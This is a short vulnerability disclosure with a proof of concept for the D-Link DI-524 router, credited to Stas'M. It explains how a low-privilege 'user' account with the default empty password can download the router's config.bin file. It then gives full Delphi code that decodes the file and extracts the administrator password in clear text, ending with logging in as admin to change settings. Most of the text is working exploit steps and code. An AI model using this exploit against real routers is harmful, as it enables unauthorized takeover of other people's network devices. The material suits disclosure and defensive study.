Obviously all known firmware versions of DI-524 is affected by this vulnerability. There is a Proof of Concept (discovered by Stas'M).
User rights is required to exploit this vulnerability. (default user credentials is user:<empty>)
Steps to exploit (let the router is at 192.168.0.1): 1. Authorize on router http://192.168.0.1/ Username: user Password: <empty>
2. Download file http://192.168.0.1/config.bin
3. Check file signature For DI-524 the default signature is "DLB6031" at offset 0.
4. Decode the file There is a function (Delphi 2010 code) to decode file. Configuration file must be loaded to TMemoryStream.
function DLB6031_Pass(var M: TMemoryStream): AnsiString; function tbl(X,Y: Byte): Byte; begin Dec(Y); Result := not X; if Y<8 then Result := Result shr (8 - Y); if Y>8 then Result := Result shl (Y and 7); end; var O: TMemoryStream; I: Integer; B1,B2: Byte; begin M.Seek(0, soFromBeginning); O:=TMemoryStream.Create; I:=0; while I < 54 do begin M.ReadBuffer(B1, 1); O.WriteBuffer(B1, 1); Inc(I); end; while I < M.Size do begin M.ReadBuffer(B1, 1); B1 := tbl(B1, M.Position mod 16); O.WriteBuffer(B1, 1); Inc(I); end; Dec(I); M.Seek(-1, soCurrent); O.Seek(54, soFromBeginning); while I > 53 do begin M.ReadBuffer(B1, 1); B1 := tbl(B1, 15 - (M.Position mod 16)); M.Seek(-2, soCurrent); O.ReadBuffer(B2, 1); B1 := B1 + B2; O.Seek(-1, soCurrent); O.WriteBuffer(B1, 1); Dec(I); end; // file is decoded and can be saved... // O.SaveToFile('...'); if O.Size >= $D5 then Result:=PAnsiChar(Cardinal(O.Memory)+$B5); // clear text password is at offset B5h O.Free; end;
5. Exploit completed Now we have administrator credentials, so we can logout and logon again with admin:<new password> and change the settings.